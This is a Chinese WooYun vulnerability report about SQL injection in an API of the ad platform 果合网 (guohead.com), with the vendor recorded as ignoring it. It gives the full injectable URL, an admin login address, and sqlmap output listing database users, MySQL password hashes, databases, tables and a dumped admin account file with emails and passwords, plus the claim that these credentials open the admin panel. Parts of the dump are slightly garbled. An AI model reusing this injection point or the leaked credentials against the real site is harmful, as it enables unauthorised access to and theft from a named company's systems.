当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095162

漏洞标题:果合网某处注入数据库为root权限

相关厂商:果合网

漏洞作者: sky

提交时间:2015-02-02 12:59

修复时间:2015-03-19 13:00

公开时间:2015-03-19 13:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入,很渣

详细说明:

注入点:http://api.mix.guohead.com/stats_app_activity.php?spid=a85a279e38364d17&client=1&gh_ver=2.0.5&app_pkg=com.ejiuwu.qpbuyu&app_ver=3.2.2&mac=020000000000&open_udid=8ec4d374f19ec87dfd632d448e6e30e42616c9f8&pmodel=iPhone7,2&wifi=1&adid=B494BDA4-C71A-44F9-A858-AC2891C230E4&is_ad_track_enabled=1&vendor_id=F469C05D-BC41-481B-ABB1-8B330ACB180B&width=568.000000&height=320.000000&os_lang=zh_CN&os_ver=8.1.2&jailbreak=1&app_dev_fml=1,2&a1=misd&a2=assertiond&a3=discoveryd&a4=fairplayd.H2&a5=cfprefsd&a6=seld&a7=discoveryd_helpe&a8=passd&a9=biometrickitd&a10=nfcd&a11=searchd&a12=nsurlsessiond&a13=InCallService&a14=bird&a15=MobileSMS&a16=ReportCrash&a17=cloudphotod&a18=cloudd&a19=coreduetd&a20=assistant_servic&a21=nsurlstoraged&a22=pkd&a23=QQ&a24=coreauthd&a25=DuetHeuristic-BM&a26=WirelessRadioMan&a27=awdd&a28=CoreAuthUI&a29=lsuseractivityd&a30=MicroMessenger&a31=rtcreportingd&a32=coresymbolicatio&a33=diagnosticd&a34=com.apple.sbd&a35=absd&a36=misagent&a37=pipelined&a38=IMDPersistenceAg&a39=CacheDeleteDaily&a40=com.apple.lakitu&a41=vvebo&a42=%C3%82%C3%A7%C3%89%C3%81%C3%87%C3%86%C3%8A%C3%A7%C3%AF%C3%88%C2%B1%C2%BA&a43=Preferences&a44=nehelper&a45=MobileSafari&a46=com.apple.WebKit&a47=com.apple.WebKit&a48=qpbuyu&a49=gamecontrollerd&a50=ReportCrash&a51=xpcproxy&initial=1
找到一个登录的地址,http://www.guohead.com/admin/login

漏洞证明:

注入出来的内容

database management system users [7]:
[*] ''@'localhost'
[*] 'guohe'@'192.168.%'
[*] 'guohead'@'192.168.1.%'
[*] 'nagios'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] guohe [1]:
    password hash: *F0EF2DFB75DECAF7AF5A6FF3BCB9A892E1E01BEE
[*] guohead [1]:
    password hash: *253F9D4A3524F18438FD5503DC57C02A48ABFFD0
[*] nagios [1]:
    password hash: *7389421331C5A33D6D2E8C64E5150601291601DA
[*] root [1]:
    password hash: NULL


密码破不了,不然可以进一步渗透

available databases [9]:
[*] guohead
[*] guoheadold
[*] guohemix
[*] information_schema
[*] mix_bi
[*] mysql
[*] performance_schema
[*] test
[*] x_blog


Database: x_blog
[11 tables]
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
Database: x_blog
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicepame       |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+
admin_user.csv
root@kali:/usr/share/sqlmap/output/api.mix.guohead.com/dump/guohead# cat admin_user.csv
id,email,password,createTime
1,[email protected],f130354a6535040a6983235}d538f3db,2010-12-06 06:29:20
2,[email protected],guohe!wangxi@recool,2010-12-06 06:29:20


Database: guohemix
[88 tables]
+---------------------------------------+
| sysconfig                             |
| windo}s2marked                        |
| activity2aid                          |
| activity2obj                          |
| activity_ad                           |
| activity_apply                        |
| activity_recycle                      |
| admin_rechange_log                    |
| advertiser_ad                         |
| advertiser_info                       |
| android_xp_pop_setting                |
| app_categpry_mapping                  |
| app_heartbeat                         |
| app_parter                            |
| app_pay_detail_as                     |
| app_pay_detail_cm                     |
| apps                                  |
| apps_bak                              |
| apps_rank                             |
| apps_rank_cate                        |
| auto_mail                             |
| changelog                             |
| developer_api                         |
| device                                |
| dic_app_category                      |
| dic_campaign_order_rule               |
| dic_campaign_orpe                     |
| dic_multiwall_list_style              |
| dic_pay_type                          |
| fill_rate                             |
| friends                               |
| game_tag                              |
| game_tag_app_map                      |
| game_tag_category                     |
| last_action                           |
| market_circle_pool                    |
| member                                |
| member_findpwd                        |
| member_intval                         |
| member_pay_detail                     |
| member_payoff                         |
| member_payoff_detail                  |
| member_withdraw                       |
| member_withdraw_info                  |
| money_manger                          |
| multiwall_actiall_campaigns           |
| multiwall_active                      |
| multiwall_appwall_campaigns_archive   |
| multiwall_dev_income                  |
| multiwall_dev_income_archive          |
| multiwall_dev_income_percent          |
| multiwall_dev_income_percent_aryhive  |
| multiwall_integral_consume_ios        |
| multiwall_integral_detail_ios         |
| multiwall_integral_rate               |
| multiwall_integral_task               |
| multiwall_liject                      |
| multiwall_list                        |
| multiwall_offerwall_campaigns         |
| multiwall_offerwall_campaigns_archive |
| multiwall_offgin                      |
| multiwall_reward_delay                |
| multiwall_stats                       |
| multiwall_stats_plugin                |
| notice                                |
| pay_policy                            |
| pay_policy_archive                    |
| paylog_income                         |
| paylog_spread                         |
| payoff_poly                           |
| pm                                    |
| pm_list                               |
| pm_notice                             |
| quantity_poly                         |
| sdk_activity_app_setting              |
| stats                                 |
| stats_dau                             |
| stats_nosdk                           |
| sys_plugin                            |
| system_notice                         |
| trade_market                          |
| union_pool                            |
| union_status                          |
| white_paper                           |
| white_paper_list                      |
| win_object                            |
| win_plugin                            |
| win_plugin_type                       |
+---------------------------------------+


利用上面爆出来的帐号密码可登录后台。。

7477828B-D642-4F52-85FB-633E460D2C00.png


修复方案:

过滤吧

版权声明:转载请注明来源 sky@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝